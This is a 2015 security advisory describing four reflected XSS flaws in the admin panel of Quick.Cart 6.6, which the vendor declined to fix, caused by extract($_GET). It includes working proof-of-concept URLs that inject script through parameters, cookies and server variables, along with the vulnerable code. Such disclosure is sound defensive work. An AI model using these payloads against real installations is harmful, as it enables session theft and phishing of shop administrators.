Quick.Cart 6.6: Multiple XSS

Date: 2015-10-07 16:06:32

Security Advisory – Curesec Research Team

1. Introduction

Affected Product:	Quick.Cart 6.6
Fixed in:	not fixed
Fixed Version Link:	n/a
Vendor Contact:	info@opensolution.org
Vulnerability Type:	XSS
Remote Exploitable:	Yes
Reported to vendor:	09/07/2015
Disclosed to public:	10/07/2015
Release mode:	Coordinated release
CVE:	n/a
Credits	Tim Coen of curesec GmbH

2. Description

Quick.Cart 6.6 is vulnerable to multiple reflected XSS attacks. With this, it is possible to inject JavaScript keylogger or perform phishing attacks.

The vulnerabilities are all in the admin.php file. To add security through obscurity, Quick.Cart does suggest to rename this file, which would make it more difficult to exploit these vulnerabilities. The renaming is not mandatory.

The vulnerabilities detailed below depend on the fact that the main entry points for users and admins contains a call to extract:

index.php extract( $_GET ); admin.php extract( $_GET );

With this, it is possible to overwrite or set any variable. Because of this, it is not considered best-practice to pass user input to extract.

The SESSION variable can not be set by an attacker, because session_start is called after extract, but variables such as SERVER or COOKIE and undefined variables can be set.

This call also makes it possible to send POST requests via GET, making the exploitation of for example CSRF easier. It may have further negative effects as well.

3. Details

XSS 1

Proof of Concept:

http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=orders-list&iStatus="><script>alert(1)</script> http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=orders-list&iProducts="><script>alert('xss')</script>

Code:

templates/admin/orders.php <form action="?p=<?php echo $p; ?><?php if( isset( $sPhrase ) ) echo '&sPhrase='.$sPhrase; ?><?php if( isset( $iStatus ) ) echo '&iStatus='.$iStatus; ?><?php if( isset( $iProducts ) ) echo '&iProducts='.$iProducts; ?>" method="post">

XSS 2

Proof of Concept:

http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=lang-translations&sLanguage=<script>alert(1)</script>

Code:

templates/admin/languages.php <h1><?php echo $lang['Languages'].( isset( $sLanguage ) ? ' '.$sLanguage : null ); ?><a href="<?php echo $config['manual_link']; ?>instruction#1.6" title="<?php echo $lang['Manual']; ?>" target="_blank"></a></h1>

XSS 3

Proof of Concept:

http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?_COOKIE[sLogin]=" autofocus onfocus="alert('xss')

Code:

common-admin.php $content = '<script type="text/javascript"> AddOnload( cursor ); </script><form method="post" action="'.$sLoginPage.'" name="form"><fieldset><input type="hidden" name="sLoginPageNext" value="'.$_SERVER['REQUEST_URI'].'" /><div id="login"><label>'.$lang['Login'].':</label><input type="text" name="sLogin" class="input" value="'.( isset( $_COOKIE['sLogin'] ) ? strip_tags( $_COOKIE['sLogin'] ) : null ).'" /></div><div id="pass"><label>'.$lang['Password'].':</label><input type="password" name="sPass" class="input" value="" /></div><div id="submit"><input type="submit" value="'.$lang['log_in'].' »" /></div></fieldset></form>';

XSS 4

Proof of Concept:

http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?_SERVER[HTTP_HOST]="></iframe><script>alert(1)</script>&_SERVER[SCRIPT_FILENAME]=/var/www/ecommerce/Quick.Cart_v6.6/admin.php

Please note that the SCRIPT_FILENAME must be set correctly, as it's used as the name of the session key and overwriting one SERVER value leads to the deletion of all other SERVER values.

Code:

core/libraries/trash.php $GLOBALS['lang']['Language'] .= '<iframe src="http://opensolution.org/news,.html?sUrl='.$_SERVER['HTTP_HOST'].'" style="display:none;"></iframe>';

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/07/2015	Informed Vendor about Issue
10/01/2015	Reminded Vendor of release date
10/01/2015	Vendor does not plan on releasing a fix, because the optional rename of the admin file may mitigate this issue already
10/07/2015	Disclosed to public